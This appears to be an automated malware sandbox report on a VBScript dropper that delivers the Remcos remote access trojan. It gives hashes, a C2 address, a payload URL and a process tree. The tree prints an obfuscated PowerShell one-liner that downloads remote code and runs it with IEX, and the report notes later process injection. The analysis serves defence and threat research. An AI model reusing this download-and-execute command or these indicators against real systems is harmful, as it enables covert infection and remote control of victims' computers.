Overview

overview

10

Static

static

Appraisal....y..vbs

windows7_x64

10

Appraisal....y..vbs

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    29-04-2021 11:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisal.property..vbs

  • Size

    704B

  • MD5

    7058bdc13d0094b435eaa07b09e76297

  • SHA1

    f9084f4c4f1756fd531007a8fd7a344207a4cd13

  • SHA256

    a465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200

  • SHA512

    1b0bfd576cfae09c9d997ea8a93fa07e9b353cd68076d6665d21a6b46940126593d3eeb78331375a64a94e0b332581e1a4207e9217b5bf142c1798ddf7a12ed7

Score
10/10
remcosrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601403.us.archive.org/35/items/all_20210429/ALL.TXT

Extracted

Family

remcos

C2

185.19.85.168:1723

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.property..vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://ia601403.us.archive.org/35/items/all_20210429/ALL.TXT';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:968
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          #cmd
          4⤵
          • Suspicious use of SetWindowsHookEx
          PID:860

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    b202c39937a0fa21b7bb729bd241eb64

    SHA1

    203e99bdbce94aec4b521b3f204a024aa20a7d11

    SHA256

    5dd55919654ce4614cdf86b386e82e2dda2ef83111953114b538b7009263e85b

    SHA512

    70fb89ad7f3f9b03bef7cdd3bc5b6e0c9607cfed0ef2ad76dae498918fd93c008b8cf190fabf65461bde441474d77e8b9ecae229ab635d9a75617029d89320b1

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    216511fdeee527598d329e19d3512596

    SHA1

    14dc421a6ef8f3664fa30ed3ac37e3dbb25b6405

    SHA256

    f3b5c00e839f0507d1f6c090e2aee03235cab95f4166c0f84b611626520fb467

    SHA512

    3a50ea3976b3ed0995ff40f08c1985aa182c0776eb2c534e73ccd7d693e525e606f4c31d7e70faf334053a71c0dba2e25da19d5b3229b54a1ca5e77ab6617cf8

    Download Submit
  • C:\Users\Public\ Microsoft.ps1
    MD5

    8f6332bbb2ac7fd6aca48c0a7c389e99

    SHA1

    f0158d25c9e29ef3769f4c5f6b23e08d836628b0

    SHA256

    ad6b1343724f61fc76f17b844d53df5b5599b1b93c3709d7a2061c52ea46c9f2

    SHA512

    5cc1a3c86976b0f4e88ca568f60f22241225b6a31a6f48f26a76bd84e9723541537c13f745745becca24f47f7a8e354dda948d30f521df5c842e56443fced8eb

    Download Submit
  • memory/860-87-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/860-85-0x00000000757E1000-0x00000000757E3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/860-84-0x000000000042EEEF-mapping.dmp
    Download
  • memory/860-83-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/968-70-0x0000000000000000-mapping.dmp
    Download
  • memory/968-77-0x00000000025F4000-0x00000000025F6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/968-86-0x0000000002360000-0x0000000002361000-memory.dmp
    Filesize

    4KB

    Download
  • memory/968-82-0x000000001AB00000-0x000000001AB1F000-memory.dmp
    Filesize

    124KB

    Download
  • memory/968-76-0x00000000025F0000-0x00000000025F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1748-59-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1988-66-0x000000001AAF4000-0x000000001AAF6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1988-68-0x000000001B720000-0x000000001B721000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1988-65-0x000000001AAF0000-0x000000001AAF2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1988-67-0x00000000022E0000-0x00000000022E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1988-64-0x0000000002440000-0x0000000002441000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1988-63-0x000000001AB70000-0x000000001AB71000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1988-62-0x0000000002400000-0x0000000002401000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1988-69-0x000000001C790000-0x000000001C791000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1988-60-0x0000000000000000-mapping.dmp
    Download